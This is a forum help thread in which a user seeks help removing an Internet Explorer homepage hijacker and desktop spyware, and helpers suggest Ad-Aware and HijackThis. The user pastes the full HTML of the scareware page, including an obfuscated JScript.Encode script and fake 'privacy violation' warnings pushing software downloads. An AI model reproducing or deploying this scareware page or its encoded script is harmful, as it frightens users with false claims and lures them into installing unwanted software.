Hi all - I have got two issues I need some help with.

Firstly, my internet explorer home page has been hi jacked with a dll I cannot access or remove (res://C:\WINDOWS\system32\shdocsv.dll/API32.htm#ID=347;065D) - it displays an advert for spyware. (Evidence Eliminator)

Secondly, my desktop has also been hi-jacked by another spyware system(http://www.antivirus-gold.com/?wm=&swm=), which has loaded a screen.html document into my C:\Windows.

I have tried using Hi-Jacksoftware (as presented in these threads) but tono avail. Can anybody help?

I think that you may be able to fix this problem by disabling the programs. I'm not sure of the names of the programs but if you could find out where they are located on your computer or even a general direction. I could help you from there.

Hi - Ive managed to solve the desktop issue - but the IE one remains. Basically a file called screen.html has been installed, that is being called by a dll located and called C:\WINDOWS\system32\shdocsv.dll/API32.htm#ID=347;065D. I can find the dll as a read only file through the command prompt, but it wont let me delete it from the command prompt.

This is the html source of the IE page.

<html><head><title>Privacy Alert</title>******** language='JavaScript'>var id='SVC'; function ok() {self.focus();self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight);}var c='205.';function xxx() {var x=new Array();x[0]='xxx';for (i=1; i<30; i++) {a=Math.round(Math.random()*70); document.write(x[a]+', ');}document.write(' ...');}</script>
******** language='JScript.Encode'>#@~^+gMAAA==W!x^DkKxP^k V`m#~ b'jOMkxT 0MW:;4CD;W9+cvTSOGS&ySFZcSq8c~qT8~q!yS+FS2cBF!W~8qvBFqvBFq+B*%B*GBcGBqq,BF8,SFq1Bc~8TFBFq0BF!XS8!T~8T8~q8!B,,BFZq~W*SFZFSqZ%~8T*BF!OSq!l~8FT~1{BFqvBqF8~qqW~cSO,SF8qBFTO~WG~8!ZS*Z~qFO~*{BF!8Sc+~FZTS*Z~8F1~fB,{~+q~+*SXW~**SW,S*WSlFSlGB&%BF8~8F*~+FSq8v~20~8FcBqq&Bv8#ING^!:nxD hMkOnvk_vXFG**F'1Vr13{B_bN3vJ,WUHKEdn}\+MxJSkx9GARkYmY;/xwELC\mdmMk2O=D+[rM+^YK.cNs^gk+m!DbOX&fx%8GT12OHUT* !F8'2Db\mmzbK(2 x6y1 'BI~M+Y;. POD!nrPG sKmEk'rAk NGhc/OCDE/{wBNl\md^DbwD).+[rM+^YK.R9Vs_k+m;.bYzqGxRF{Z,2OHU!lR!8F'wMk-C1Xbh(&y'6y1+-Ei,DnY;. POD!nJ,WU\KE/n6!YxJSr NGSRkYlDEkx-E-viM+O;MxPD.EJ@*EQC_E@!Jl@*BbI)@#@&0!UmDkGU,+x-c*P`+7C^`jDDbxoc0MG:;tCD;W[nvF!ZSF8F~O1SF8GBFT,SqZFSF8T~8FSWv~qqO~qFWS8!XBF8v~8!8ScZ~f,BvTS8F*B1,BFFWSq!l~8F+~qq+~f Bq!R~1{BFFTS8!f~8qF~1F~8!&BFZq~+FS&W~qT+~,FSF8%~O{SF8*B,1~qqW~q!lSF8 Sq8v~f*B&+~8ql~q8cB,,Bv8S&W~q!W~qq+~F8~8F BX0~WGBc{~f1Bcf~O1~W&SfO~c1Sl*S*lSWvSW,B*!B*ZSc+~X!B*XSWG~8TFBFFZSqFR~WGSFTqBFq!BqFR~*BFF+S8!*~8qy~fW~+ ~+!B*GBFq*B,1S8FcBq!l~F8+SF8vBv+~f1Bcq~l1#*iNQgABAA==^#~@</script><style>a:link{font:8pt/11pt verdana; color:black} a:visited{font:8pt/11pt verdana; color:black} font{color:black; font:8pt/11pt verdana} font.red{color:red; font:8pt/11pt verdana} font.ee{font:15pt/18pt verdana; color:blue} font.es{font:10pt/13pt verdana; color:blue} font.el{font:8pt/11pt verdana; color:blue} a:link{text-decoration:none} a:visited{text-decoration:none} a{text-decoration:none}</style></head><body bgcolor="#FFFFFF" onselectstart="return false;" oncontextmenu="return false;" ondragstart="return false;" onload="ok();"><table width=600 cellpadding=3 cellspacing=5 border=0><tr><td valign=top align=left width="5%"><img src='res://shdoclc.dll/pagerror.gif'></td><td align=left width="95%"><font style='font: 13pt/15pt verdana; color: red'>Privacy Violation Detected</font><br></td></tr><tr><td width=600 colspan=2><font>Warning: your internet activities are being recorded...<br><br><font size=1><hr color='#C0C0C0' noshade><br><font class='red'>Your PC keeps records of all your online and off-line activity.</font> Any websites you view, e-mails you send, and everything else you or someone else have ever done on your computer can be found out.<br>******** language='javascript'>link("<font class='es'><u>You need special software to resolve this problem, click here now</u></font>");</script><br><ul>******** language='javascript'>env();</script><li> They know <font class='red'>you are using</font> ******** language='javascript'>document.write(navigator.appName);</script></li><br><br><li> They know <font class='red'>your system is</font> ******** language='javascript'>document.write(navigator.userAgent);</script></li><br><br>******** language='javascript'>if (navigator.userAgent.indexOf("Win")!=-1) {document.write('<li> They know your <font class=\'red\'>computer content</font>, it is on the Internet: <a href="javascript:void(0);" onClick="window.open(\'file:///C:/\',\'wn001\',\'left=0,top=0\');return false;"><font size=1 class="el"><u>click here to see your C: disk</u></font></a></li><br><br>');}</script><li> <font class='red'>These words have been found in your system records:</font><br>******** language='javascript'>xxx();</script></li><br><br><li> Your risk status for further investigation: <font class='red'>VERY HIGH RISK</font></li><br><br><li> Time of latest investigation: ******** language='javascript'>var right_now=new Date(), right_hours=right_now.getHours(), right_min=right_now.getMinutes(), right_sec=right_now.getSeconds(), ampm=' a.m.';if (right_hours > 12) right_hours = right_hours - 12;document.write(right_hours); document.write(':'); if (right_min < 10) document.write('0'); document.write(right_min); document.write(':'); if (right_sec < 10) document.write('0'); document.write(right_sec); if (right_now.getHours() > 12) ampm=' p.m.'; document.write(ampm); document.write(' on ');function makeArray() {for (i = 0; i<makeArray.arguments.length; i++)this[i + 1] = makeArray.arguments[i]; }var months = new makeArray('January','February','March','April','May','June','July','August','September','October','November','December'), date = new Date(), day = date.getDate(), month = date.getMonth() + 1, yy = date.getYear(), year = (yy < 1000) ? yy + 1900 : yy;document.write(day + ' ' + months[month] + ' ' + year);</script></li></ul><font class='red'>YOUR COMPUTER IS FULL OF EVIDENCE</font><br><br>Your hard drive might appear clean, but still be full of 'sensitive material' that you did not want to download in the first place and it might very well be a serious criminal offence to have that data stored on your computer even if you didn't know it was still there.<br><br>How would you feel if a snoop made this information public to your spouse, mother & father, neighbors, children, boss, church or the media?<br><br>To avoid such problems in future, professionally clean up your records before they are available to everybody and keep your computer secure & private, we recommend you to use approved & certificated software.<br><br>******** language='javascript'>link("<font class='ee'><u>Click here to download privacy protection software</u><br>and get more information about this problem</font>");</script><br><br><br><br><br><font color="#666666">******** language='javascript'>document.write('#'+Math.round(Math.random()*1000)+'-'+Math.round(Math.random()*50000));</script> Client Investigation Report</font><br><br><br><b>Disclaimer:</b><br>The information is provided "as is" without warranty of any kind.<br>But if you don't follow our recommendations & don't use ******** language='javascript'>link("<font class='el'><u>required software</u></font>");</script>, we will disclaim all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if we have been advised of the possibility of such damages.<br><br><br><br><br></font></td></tr></table></body></html>

Can you access your control panel?

Yes - like I say I have fixed the desktop issue - although I have an exe file called gdbj.exe that caused the problem left in my Temp file - and I cannot delete it.

The issue remaining is the home page for IE - I have since downloaded firefox as a temporary solution - but obviously not perfect.

I use Firefox. Firefox is the perfect solution. Rants on...lol

Anyway...
Do you use Adaware? I think that Adaware may let you delete it.

The IE problem.. is a little tougher... Do you know the name of the program that causes this problem? Do you know where it is located on you computer?

EDIT: I hope that I don't get into trouble for this...

EDIT AGAIN: I wonder why Buckeye-Sam hasn't posted here yet... :scratch:

Hi yes - the problem is caused by an 'invisible dll' located in C:\Windows.

It is also calling an API called API32.htm. But is cannot locate this (ive performed a search, and found one in the Temp directory, deleted it, but the problem was still there.)

I can locate the dll through the command line, but it is read only. I have started the computer in safe mode, but it is still in read only mode there aswell.

Im confused!

We need to get a look at what's running on your computer in order to help you. Please follow the directions at this link to download a tool called Hijackthis and post a log.

http://www.short-media.com/forum/showpost.php?p=172584&postcount=2